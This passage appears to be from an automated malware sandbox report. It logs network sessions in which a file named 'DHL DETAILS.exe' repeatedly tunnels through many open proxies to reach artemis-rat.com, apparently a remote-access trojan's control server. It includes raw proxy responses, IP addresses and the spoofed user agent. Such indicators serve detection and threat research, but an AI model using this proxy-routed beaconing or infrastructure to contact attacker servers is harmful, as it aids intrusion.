                                                                                    Mar 9, 2024 13:14:20.521869898 CET536INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Length: 663
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to co
                                                                                    Mar 9, 2024 13:14:20.521879911 CET429INData Raw: 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 72 6f 6f 74 40 73 65 72 76
                                                                                    Data Ascii: mpleteyour request.</p><p>Please contact the server administrator at root@server.sena.cl to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    731192.168.2.55220451.210.223.930006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.204931974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    732192.168.2.552473185.238.228.67806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.205563068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.360583067 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    733192.168.2.552483104.23.128.174806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.205825090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.360881090 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    734192.168.2.552364201.174.239.2841536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.206161022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    735192.168.2.552489104.20.178.166806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.206355095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.361043930 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    736192.168.2.552224161.97.173.42524636352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.206552029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.848678112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.833417892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.724040985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.333233118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:26.020694971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.646261930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.833729029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    737192.168.2.552498203.24.108.194806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.206617117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.363168001 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    738192.168.2.55239731.204.28.13654326352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.206948042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.411521912 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 65
                                                                                    Proxy-Authenticate: Basic realm="Proxy"
                                                                                    Connection: close
                                                                                    Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                    Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    739192.168.2.552500104.17.166.210806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.207350016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.364064932 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    740192.168.2.55221720.37.207.880806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.208914995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.516810894 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0
                                                                                    Mar 9, 2024 13:14:31.352876902 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    741192.168.2.55224851.89.173.40233136352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.216548920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.895571947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.036478043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036616087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    742192.168.2.55239438.162.13.12631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.217344999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.647043943 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm=""
                                                                                    Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                    Data Ascii: Proxy Authentication Required


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    743192.168.2.55153982.113.157.122312806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.217859983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.950242043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.781300068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    744192.168.2.55154820.0.91.150806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.220485926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.360521078 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    745192.168.2.55241638.54.95.1980606352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.224204063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.444245100 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    746192.168.2.55244634.135.166.24806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.227761030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    747192.168.2.55224265.21.255.19731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.228094101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.551858902 CET75INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:15.877722979 CET103INHTTP/1.1 400 Bad Request
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                    Data Ascii: 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    748192.168.2.55229792.205.28.24585606352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.228096008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.950340986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.974009037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    749192.168.2.5522228.142.3.14533066352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.229228973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.911226034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    750192.168.2.55233313.38.176.10431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.234024048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.530936956 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    751192.168.2.551981119.39.68.10523236352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.235954046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.226620913 CET39INHTTP/1.0 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    752192.168.2.55234593.190.141.102478516352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.237607956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.535159111 CET226INHTTP/1.1 403 Forbidden
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Length: 101
                                                                                    Content-Type: text/plain; charset=utf-8
